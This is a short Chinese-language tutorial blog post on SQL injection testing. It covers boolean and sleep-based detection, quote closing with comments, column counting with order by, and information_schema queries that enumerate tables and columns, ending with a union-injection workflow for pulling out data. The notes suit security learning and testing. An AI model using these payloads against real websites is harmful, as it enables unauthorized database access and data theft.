sql注入

sql注入 用户输入的数据被当作sql代码执行

1.判断目标是否存在sql注入

经典判断 1 and 1=1正常 1 and1=2  错误

select*from news where id=1 and 1=1正常

select*from news where id=1 and 1=2 错误

and 和1=1 都起到了sql代码的意义

如果 1=1 1=2  都正常 大概率被强转(把用户的传参 强制改变格式)

强转就不能判断SQL注入了

常用判断

1)运算符(数字型)判断 2-1得到 1的数据

+  url编码(网页在传递数据的一种编码)

可以用工具 sqlmap 不可以的话就 假设存在漏洞 进行下一步操作

2)and sleep() 一旦生效 就是有SQL注入

闭合 ''  用来标记数据      "" 用来标记数据  --空  注释 

select*from news where id= '1' and 1=1 -- qwe '

当注释不能用注释时 多闭合

select*from news where id= '1' and '1'='1'

2.通过漏洞尝试获取一些信息

用 order by 来判断字段数

查数据:
            库 database()  
            表 系统自带库[information_schema库] 库.表.字段 选择这个库里面的这个表里面的字段
                select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

                limit 100,99 => 从第101条数据开始,取99条 101-199

                tables 存放的是当前的数据库里面所有库和表的对应
            字段:
                information_schema.columns 表

                select 1,column_name from information_schema.columns where table_name='admin' and table_schema=database()

        一套完整的显错联合查询SQL注入:
            判断 -> 猜字段数 -> 找显示位 -> 查库名 -> 查表名 -> 查字段名 -> 出数据

在测试中  只要查询出数据 就可认定漏洞

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值